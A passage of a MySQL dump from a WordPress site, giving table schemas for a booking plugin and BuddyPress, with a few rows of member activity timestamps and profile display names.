/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_activities`
--

LOCK TABLES `wp_bookacti_activities` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_activities` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_activities` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_booking_groups`
--

DROP TABLE IF EXISTS `wp_bookacti_booking_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_booking_groups` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `group_date` date DEFAULT NULL,
  `category_id` bigint(20) unsigned DEFAULT NULL,
  `event_group_id` bigint(20) unsigned DEFAULT NULL,
  `user_id` varchar(64) DEFAULT NULL,
  `order_id` bigint(20) unsigned DEFAULT NULL,
  `form_id` bigint(20) unsigned DEFAULT NULL,
  `state` varchar(32) NOT NULL DEFAULT 'booked',
  `payment_status` varchar(32) NOT NULL DEFAULT 'none',
  `active` tinyint(1) unsigned NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_booking_groups`
--

LOCK TABLES `wp_bookacti_booking_groups` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_booking_groups` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_booking_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_bookings`
--

DROP TABLE IF EXISTS `wp_bookacti_bookings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_bookings` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` varchar(64) DEFAULT NULL,
  `order_id` bigint(20) unsigned DEFAULT NULL,
  `form_id` bigint(20) unsigned DEFAULT NULL,
  `group_id` bigint(20) unsigned DEFAULT NULL,
  `activity_id` bigint(20) unsigned DEFAULT NULL,
  `event_id` bigint(20) unsigned DEFAULT NULL,
  `event_start` datetime DEFAULT NULL,
  `event_end` datetime DEFAULT NULL,
  `state` varchar(32) NOT NULL DEFAULT 'booked',
  `payment_status` varchar(32) NOT NULL DEFAULT 'none',
  `creation_date` datetime DEFAULT NULL,
  `expiration_date` datetime DEFAULT NULL,
  `quantity` mediumint(9) unsigned NOT NULL DEFAULT 1,
  `active` tinyint(1) unsigned NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_bookings`
--

LOCK TABLES `wp_bookacti_bookings` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_bookings` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_bookings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_event_groups`
--

DROP TABLE IF EXISTS `wp_bookacti_event_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_event_groups` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `category_id` bigint(20) unsigned NOT NULL,
  `title` text DEFAULT NULL,
  `repeat_freq` varchar(32) NOT NULL DEFAULT 'none',
  `repeat_step` smallint(4) unsigned DEFAULT NULL,
  `repeat_on` varchar(32) DEFAULT NULL,
  `repeat_from` date DEFAULT NULL,
  `repeat_to` date DEFAULT NULL,
  `repeat_exceptions` longtext DEFAULT NULL,
  `active` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_event_groups`
--

LOCK TABLES `wp_bookacti_event_groups` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_event_groups` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_event_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_events`
--

DROP TABLE IF EXISTS `wp_bookacti_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_events` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `template_id` bigint(20) unsigned NOT NULL,
  `activity_id` bigint(20) unsigned NOT NULL,
  `title` text DEFAULT NULL,
  `start` datetime DEFAULT NULL,
  `end` datetime DEFAULT NULL,
  `availability` mediumint(9) unsigned NOT NULL DEFAULT 0,
  `repeat_freq` varchar(32) NOT NULL DEFAULT 'none',
  `repeat_step` smallint(4) unsigned DEFAULT NULL,
  `repeat_on` varchar(32) DEFAULT NULL,
  `repeat_from` date DEFAULT NULL,
  `repeat_to` date DEFAULT NULL,
  `repeat_exceptions` longtext DEFAULT NULL,
  `active` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_events`
--

LOCK TABLES `wp_bookacti_events` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_exports`
--

DROP TABLE IF EXISTS `wp_bookacti_exports`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_exports` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `type` varchar(128) DEFAULT NULL,
  `args` text DEFAULT NULL,
  `creation_date` datetime DEFAULT NULL,
  `expiration_date` datetime DEFAULT NULL,
  `sequence` bigint(20) unsigned DEFAULT 0,
  `active` tinyint(1) unsigned NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_exports`
--

LOCK TABLES `wp_bookacti_exports` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_exports` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_exports` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_form_fields`
--

DROP TABLE IF EXISTS `wp_bookacti_form_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_form_fields` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) unsigned NOT NULL,
  `name` varchar(128) DEFAULT NULL,
  `type` varchar(128) DEFAULT NULL,
  `title` text DEFAULT NULL,
  `label` text DEFAULT NULL,
  `options` text DEFAULT NULL,
  `value` text DEFAULT NULL,
  `placeholder` text DEFAULT NULL,
  `tip` text DEFAULT NULL,
  `required` tinyint(1) NOT NULL DEFAULT 0,
  `active` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_form_fields`
--

LOCK TABLES `wp_bookacti_form_fields` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_form_fields` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_form_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_forms`
--

DROP TABLE IF EXISTS `wp_bookacti_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_forms` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `title` text DEFAULT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `creation_date` datetime DEFAULT NULL,
  `status` varchar(32) NOT NULL DEFAULT 'publish',
  `active` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_forms`
--

LOCK TABLES `wp_bookacti_forms` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_forms` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_group_categories`
--

DROP TABLE IF EXISTS `wp_bookacti_group_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_group_categories` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `template_id` bigint(20) unsigned NOT NULL,
  `title` text DEFAULT NULL,
  `active` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_group_categories`
--

LOCK TABLES `wp_bookacti_group_categories` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_group_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_group_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_groups_events`
--

DROP TABLE IF EXISTS `wp_bookacti_groups_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_groups_events` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `group_id` bigint(20) unsigned NOT NULL,
  `activity_id` bigint(20) unsigned DEFAULT NULL,
  `event_id` bigint(20) unsigned DEFAULT NULL,
  `event_start` datetime DEFAULT NULL,
  `event_end` datetime DEFAULT NULL,
  `active` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_groups_events`
--

LOCK TABLES `wp_bookacti_groups_events` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_groups_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_groups_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_meta`
--

DROP TABLE IF EXISTS `wp_bookacti_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_meta` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `object_type` varchar(128) DEFAULT NULL,
  `object_id` bigint(20) unsigned DEFAULT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_meta`
--

LOCK TABLES `wp_bookacti_meta` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_permissions`
--

DROP TABLE IF EXISTS `wp_bookacti_permissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_permissions` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `object_type` varchar(128) DEFAULT NULL,
  `object_id` bigint(20) unsigned DEFAULT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_permissions`
--

LOCK TABLES `wp_bookacti_permissions` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_permissions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_permissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_templates`
--

DROP TABLE IF EXISTS `wp_bookacti_templates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_templates` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `title` text DEFAULT NULL,
  `active` tinyint(1) unsigned NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_templates`
--

LOCK TABLES `wp_bookacti_templates` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_templates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_templates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_templates_activities`
--

DROP TABLE IF EXISTS `wp_bookacti_templates_activities`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_templates_activities` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `template_id` bigint(20) unsigned DEFAULT NULL,
  `activity_id` bigint(20) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bookacti_templates_activities`
--

LOCK TABLES `wp_bookacti_templates_activities` WRITE;
/*!40000 ALTER TABLE `wp_bookacti_templates_activities` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bookacti_templates_activities` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bp_activity`
--

DROP TABLE IF EXISTS `wp_bp_activity`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bp_activity` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `component` varchar(75) NOT NULL,
  `type` varchar(75) NOT NULL,
  `action` text NOT NULL,
  `content` longtext NOT NULL,
  `primary_link` text NOT NULL,
  `item_id` bigint(20) NOT NULL,
  `secondary_item_id` bigint(20) DEFAULT NULL,
  `date_recorded` datetime NOT NULL,
  `hide_sitewide` tinyint(1) DEFAULT 0,
  `mptt_left` int(11) NOT NULL DEFAULT 0,
  `mptt_right` int(11) NOT NULL DEFAULT 0,
  `is_spam` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `date_recorded` (`date_recorded`),
  KEY `user_id` (`user_id`),
  KEY `item_id` (`item_id`),
  KEY `secondary_item_id` (`secondary_item_id`),
  KEY `component` (`component`),
  KEY `type` (`type`),
  KEY `mptt_left` (`mptt_left`),
  KEY `mptt_right` (`mptt_right`),
  KEY `hide_sitewide` (`hide_sitewide`),
  KEY `is_spam` (`is_spam`)
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bp_activity`
--

LOCK TABLES `wp_bp_activity` WRITE;
/*!40000 ALTER TABLE `wp_bp_activity` DISABLE KEYS */;
INSERT INTO `wp_bp_activity` VALUES (1,1,'members','last_activity','','','',0,NULL,'2022-09-20 05:00:33',0,0,0,0),(2,2,'members','last_activity','','','',0,NULL,'2022-08-22 11:46:39',0,0,0,0),(3,14,'members','last_activity','','','',0,NULL,'2022-02-15 07:27:30',0,0,0,0),(4,15,'members','last_activity','','','',0,NULL,'2022-02-24 10:40:01',0,0,0,0),(5,16,'members','last_activity','','','',0,NULL,'2022-02-22 05:22:43',0,0,0,0),(7,18,'members','last_activity','','','',0,NULL,'2022-02-23 12:23:48',0,0,0,0),(8,19,'members','last_activity','','','',0,NULL,'2022-02-23 12:03:42',0,0,0,0),(9,20,'members','last_activity','','','',0,NULL,'2022-02-25 11:25:03',0,0,0,0),(10,21,'members','last_activity','','','',0,NULL,'2022-06-22 06:39:49',0,0,0,0),(11,22,'members','last_activity','','','',0,NULL,'2022-02-24 10:08:48',0,0,0,0),(12,23,'members','last_activity','','','',0,NULL,'2022-02-24 11:09:56',0,0,0,0),(13,25,'members','last_activity','','','',0,NULL,'2022-03-15 09:35:44',0,0,0,0),(14,26,'members','last_activity','','','',0,NULL,'2022-03-10 06:32:04',0,0,0,0),(15,27,'members','last_activity','','','',0,NULL,'2022-03-14 05:59:24',0,0,0,0),(16,28,'members','last_activity','','','',0,NULL,'2022-03-15 07:48:25',0,0,0,0),(17,29,'members','last_activity','','','',0,NULL,'2022-03-15 10:04:31',0,0,0,0),(18,30,'members','last_activity','','','',0,NULL,'2022-03-18 16:01:11',0,0,0,0),(19,5,'members','last_activity','','','',0,NULL,'2022-08-24 00:22:20',0,0,0,0);
/*!40000 ALTER TABLE `wp_bp_activity` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bp_activity_meta`
--

DROP TABLE IF EXISTS `wp_bp_activity_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bp_activity_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `activity_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `activity_id` (`activity_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bp_activity_meta`
--

LOCK TABLES `wp_bp_activity_meta` WRITE;
/*!40000 ALTER TABLE `wp_bp_activity_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bp_activity_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bp_invitations`
--

DROP TABLE IF EXISTS `wp_bp_invitations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bp_invitations` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `inviter_id` bigint(20) NOT NULL,
  `invitee_email` varchar(100) DEFAULT NULL,
  `class` varchar(120) NOT NULL,
  `item_id` bigint(20) NOT NULL,
  `secondary_item_id` bigint(20) DEFAULT NULL,
  `type` varchar(12) NOT NULL DEFAULT 'invite',
  `content` longtext DEFAULT '',
  `date_modified` datetime NOT NULL,
  `invite_sent` tinyint(1) NOT NULL DEFAULT 0,
  `accepted` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`),
  KEY `inviter_id` (`inviter_id`),
  KEY `invitee_email` (`invitee_email`),
  KEY `class` (`class`),
  KEY `item_id` (`item_id`),
  KEY `secondary_item_id` (`secondary_item_id`),
  KEY `type` (`type`),
  KEY `invite_sent` (`invite_sent`),
  KEY `accepted` (`accepted`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bp_invitations`
--

LOCK TABLES `wp_bp_invitations` WRITE;
/*!40000 ALTER TABLE `wp_bp_invitations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bp_invitations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bp_notifications`
--

DROP TABLE IF EXISTS `wp_bp_notifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bp_notifications` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `item_id` bigint(20) NOT NULL,
  `secondary_item_id` bigint(20) DEFAULT NULL,
  `component_name` varchar(75) NOT NULL,
  `component_action` varchar(75) NOT NULL,
  `date_notified` datetime NOT NULL,
  `is_new` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `item_id` (`item_id`),
  KEY `secondary_item_id` (`secondary_item_id`),
  KEY `user_id` (`user_id`),
  KEY `is_new` (`is_new`),
  KEY `component_name` (`component_name`),
  KEY `component_action` (`component_action`),
  KEY `useritem` (`user_id`,`is_new`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bp_notifications`
--

LOCK TABLES `wp_bp_notifications` WRITE;
/*!40000 ALTER TABLE `wp_bp_notifications` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bp_notifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bp_notifications_meta`
--

DROP TABLE IF EXISTS `wp_bp_notifications_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bp_notifications_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `notification_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `notification_id` (`notification_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bp_notifications_meta`
--

LOCK TABLES `wp_bp_notifications_meta` WRITE;
/*!40000 ALTER TABLE `wp_bp_notifications_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bp_notifications_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bp_optouts`
--

DROP TABLE IF EXISTS `wp_bp_optouts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bp_optouts` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `email_address_hash` varchar(255) NOT NULL,
  `user_id` bigint(20) NOT NULL,
  `email_type` varchar(255) NOT NULL,
  `date_modified` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`),
  KEY `email_type` (`email_type`),
  KEY `date_modified` (`date_modified`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bp_optouts`
--

LOCK TABLES `wp_bp_optouts` WRITE;
/*!40000 ALTER TABLE `wp_bp_optouts` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bp_optouts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bp_xprofile_data`
--

DROP TABLE IF EXISTS `wp_bp_xprofile_data`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bp_xprofile_data` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `field_id` bigint(20) unsigned NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL,
  `value` longtext NOT NULL,
  `last_updated` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `field_id` (`field_id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bp_xprofile_data`
--

LOCK TABLES `wp_bp_xprofile_data` WRITE;
/*!40000 ALTER TABLE `wp_bp_xprofile_data` DISABLE KEYS */;
INSERT INTO `wp_bp_xprofile_data` VALUES (1,1,14,'venkateshavn','2022-02-15 07:15:37'),(2,1,1,'sitemanager','2022-02-17 05:50:41'),(3,1,15,'Nimyajose10','2022-02-17 11:51:17'),(4,1,16,'4dm16ec024.nimyajose','2022-02-22 05:17:38'),(5,1,18,'archana','2022-02-23 11:55:01'),(6,1,19,'Asdfghj','2022-02-23 12:03:39'),(7,1,20,'Pavitra','2022-02-23 12:10:13'),(8,1,22,'chethan','2022-02-24 09:40:33'),(9,1,25,'xyzabc9980','2022-03-03 05:15:18'),(10,1,28,'utftech9','2022-03-15 07:15:44');
/*!40000 ALTER TABLE `wp_bp_xprofile_data` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bp_xprofile_fields`
--

DROP TABLE IF EXISTS `wp_bp_xprofile_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bp_xprofile_fields` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `group_id` bigint(20) unsigned NOT NULL,
  `parent_id` bigint(20) unsigned NOT NULL,
  `type` varchar(150) NOT NULL,
  `name` varchar(150) NOT NULL,
  `description` longtext NOT NULL,
  `is_required` tinyint(1) NOT NULL DEFAULT 0,
  `is_default_option` tinyint(1) NOT NULL DEFAULT 0,
  `field_order` bigint(20) NOT NULL DEFAULT 0,
  `option_order` bigint(20) NOT NULL DEFAULT 0,
  `order_by` varchar(15) NOT NULL DEFAULT '',
  `can_delete` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `group_id` (`group_id`),
  KEY `parent_id` (`parent_id`),
  KEY `field_order` (`field_order`),
  KEY `can_delete` (`can_delete`),
  KEY `is_required` (`is_required`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bp_xprofile_fields`
--

LOCK TABLES `wp_bp_xprofile_fields` WRITE;
/*!40000 ALTER TABLE `wp_bp_xprofile_fields` DISABLE KEYS */;
INSERT INTO `wp_bp_xprofile_fields` VALUES (1,1,0,'textbox','Name','',1,0,0,0,'',0);
/*!40000 ALTER TABLE `wp_bp_xprofile_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bp_xprofile_groups`
--

DROP TABLE IF EXISTS `wp_bp_xprofile_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bp_xprofile_groups` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(150) NOT NULL,
  `description` mediumtext NOT NULL,
  `group_order` bigint(20) NOT NULL DEFAULT 0,
  `can_delete` tinyint(1) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `can_delete` (`can_delete`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bp_xprofile_groups`
--

LOCK TABLES `wp_bp_xprofile_groups` WRITE;
/*!40000 ALTER TABLE `wp_bp_xprofile_groups` DISABLE KEYS */;
INSERT INTO `wp_bp_xprofile_groups` VALUES (1,'Base','',0,0);
/*!40000 ALTER TABLE `wp_bp_xprofile_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bp_xprofile_meta`
--

DROP TABLE IF EXISTS `wp_bp_xprofile_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bp_xprofile_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `object_id` bigint(20) NOT NULL,
  `object_type` varchar(150) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `object_id` (`object_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_bp_xprofile_meta`
--

LOCK TABLES `wp_bp_xprofile_meta` WRITE;
/*!40000 ALTER TABLE `wp_bp_xprofile_meta` DISABLE KEYS */;
INSERT INTO `wp_bp_xprofile_meta` VALUES (1,1,'field','allow_custom_visibility','disabled'),(2,1,'field','signup_position','1');
